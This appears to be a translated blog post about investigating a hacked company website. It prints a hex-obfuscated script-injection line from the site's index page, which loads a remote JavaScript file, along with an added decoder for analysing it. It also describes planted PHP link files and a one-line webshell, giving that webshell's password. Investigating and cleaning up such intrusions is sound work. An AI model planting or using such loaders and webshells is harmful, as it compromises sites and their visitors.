Yesterday the manager came over again and said that something had been planted on the company's website.
Since I don't know anything about penetration testing, all I could do was feel my way around blindly.
What is in the front page (index) file?
The three main tags are as follows:
There was also a block of JS code. When I copied it into Baidu, I found that this code turns up on practically every compromised site, but I had no idea what it actually does.
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
It is hex-escaped; decoding the escapes back into characters gives the following:
If you don't look closely, you would miss that this line writes the output of a remote JS file into the page.
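To see what the obfuscated line does without running it in a browser, here is an added example (not code from the original post) that decodes the \xNN escapes as plain text and pulls out the property chain being called and the external script it loads. The allowlist of script hosts is an assumed placeholder policy, not something the post describes.

```javascript
// Added example, not code from the original post: statically decode the
// hex-escaped snippet found in the site's index file so a defender can read
// what it does without executing it in a browser.
// The sample below is the obfuscated line quoted in the post (String.raw
// keeps the backslashes literal instead of letting JS decode them).
const OBFUSCATED = String.raw`window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');`;

// Replace every \xNN escape with the character it encodes. This is plain
// string processing, so nothing in the snippet ever runs.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Pull out what the decoded line actually does: which window property chain
// it calls and which external script it pulls in.
function extractInjectedScript(snippet) {
  const decoded = decodeHexEscapes(snippet);
  const chain = [...decoded.matchAll(/\["([^"]+)"\]/g)].map(m => m[1]);
  const srcMatch = /src="([^"]+)"/.exec(decoded);
  const src = srcMatch ? srcMatch[1] : null;
  return {
    decoded,
    call: 'window.' + chain.join('.'), // e.g. window.document.write
    src,
    host: src ? new URL(src).hostname : null,
  };
}

// Triage rule (assumed policy, not from the post): any script host that is not
// on the site's own allowlist is treated as an injected, foreign script.
const ALLOWED_SCRIPT_HOSTS = ['www.example-company.com']; // placeholder
function isForeignScript(info) {
  return info.host !== null && !ALLOWED_SCRIPT_HOSTS.includes(info.host);
}

const info = extractInjectedScript(OBFUSCATED);
console.log(info.decoded);
console.log(`${info.call} loads ${info.src} -> foreign: ${isForeignScript(info)}`);
```

The decoded line is a document.write of a script tag pointing at a host the site does not own, which is what the scan of the index file should flag.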
At the bottom of the page I found a bunch of links to PHP files.
So next I went to look at where these PHP files were.
It turned out that these files are identical apart from their names. Looking at the PHP code again: it fetches the content at the address given by reads, passes it to a user-defined function, and outputs the result.
So I decisively opened that address, but because the company's website had been compromised for so long, that address unfortunately now returns a 404 as well.
Checking the logs
Now that I knew where the hidden link had been planted on the page, I had to check how the attacker got in.
First of all, guessing the FTP password is out of the question: the FTP passwords for all of the company's websites are randomly generated and mix upper case, lower case and digits.
Then I downloaded all of the site's access logs, but because the compromise happened so long ago, I couldn't find anything.
Next I wanted to check the operation log in the admin backend, only to find that the backend had been written by my predecessors at the company and was far from complete; there was no operation log at all.
The truth remains unknown.
What about SafeDog?
Since I can't find it by hand, I'll use software to find where the backdoor is.
Take a look at Website SafeDog: http://free.safedog.cn/website_ safedog.html
(@SafeDog, please pay me for the advertising)
After downloading all of the website's files, a single scan turned up a whole pile of Trojans.
Because I used to play at simple intrusions with a one-line Trojan, I opened the second scan result at random, and it really was one of those!!!
Next I opened the Trojan file. Only two lines of code are actually live in the whole file; the rest is all commented-out code (it even disguises itself as a DedeCMS (织梦) file, which is pretty impressive).
Copy these two lines into Baidu and see what they are.
It really is a one-line Trojan. After searching Baidu for this line, I learned that the Trojan's password is 4.
Well, now that I know it's a one-line Trojan, let me try the legendary China Chopper (中国菜刀) tool I used to mess around with.
Sure enough, I got full control of the website.
To be continued
There is far too much to say about penetration; doing a proper job of securing the website is what matters most. Any security holes and Trojan files you find should be deleted promptly, so that the bad guys have no opening to exploit!!!
As for the company's website's vulnerabilities, emmmmm... still looking~